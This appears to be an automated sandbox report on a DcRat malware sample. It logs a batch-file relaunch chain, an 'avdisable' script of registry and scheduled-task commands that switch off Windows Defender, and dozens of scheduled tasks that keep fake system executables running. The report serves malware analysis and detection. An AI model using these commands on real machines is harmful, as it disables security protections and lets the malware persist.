C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"18⤵PID:4036
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:219⤵PID:2076
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"19⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat"20⤵PID:228
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:221⤵PID:5040
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"21⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat"22⤵PID:5072
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:223⤵PID:5000
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"23⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat"24⤵PID:320
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:225⤵PID:2604
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"25⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"26⤵PID:1516
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:227⤵PID:4256
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"27⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat"28⤵PID:2852
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:229⤵PID:2328
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"29⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3188 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat"30⤵PID:1284
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:231⤵PID:3568
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"31⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat"32⤵PID:1508
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:233⤵PID:1416
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"33⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat"34⤵PID:4932
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:235⤵PID:3196
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"35⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"36⤵PID:200
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:237⤵PID:1476
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"37⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"38⤵PID:3584
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:239⤵PID:32
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"39⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"40⤵PID:3136
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:241⤵PID:2764
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"41⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"42⤵PID:4732
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:243⤵PID:4708
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"43⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"44⤵PID:2468
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:245⤵PID:976
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"45⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"46⤵PID:4656
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:247⤵PID:2696
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:2280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- DcRat
- Modifies Windows Defender Real-time Protection settings
PID:4748
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:3640
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:316
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:208
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1888
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2784
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4676
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:704
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1652
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:4948
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:800
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:3484
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4688
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:5020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:3916
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:3396
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:440
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:4940
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:2260
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:4600
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:808
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2220
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3220
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:4564
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4184
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4724
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b20a84a0d572356548413fcf7e1c8ff1
SHA1b02347fd036ce5c9df0cac4f8898e25c1bcef9b6
SHA2569d2be47e92371e5abe5f070cce2cfeaed2018f85ff7b8f22849e9088e74df971
SHA512d03b545a0bfcc79c1bd11f46bbec09e6cfa1159bd9b70fd297c3c847f7a397200d376098a486f23bab37fd487edff683fc0f798844d363ba41d2ae4cc7d02cef
-
Filesize
199B
MD5a057be178907b374ad8793ca7aa478be
SHA1029c1e9f31008d34d59c6bbbc3c79ba5178e7cf7
SHA256581702742101391ac48b2b26a2eaa6199990934b84abfe070fba5bfebed04bba
SHA512fa72c3ccb46814e03e34796361a115a4d09b5e0278a6e16667a3d8bc392f667da69e0aee4332d1cfd89d525a3abfd089cb6987a0eb36d041ef12d11d3650a4a6
-
Filesize
199B
MD50c68b8bf8541d2ba1156d3e2906f0dc1
SHA1bca847270732e07d016980a9946f23d300c1813d
SHA2561370e0d250e1aede938f94c4fad64aab114b30b025d3a3ef71dd37c264c63bc1
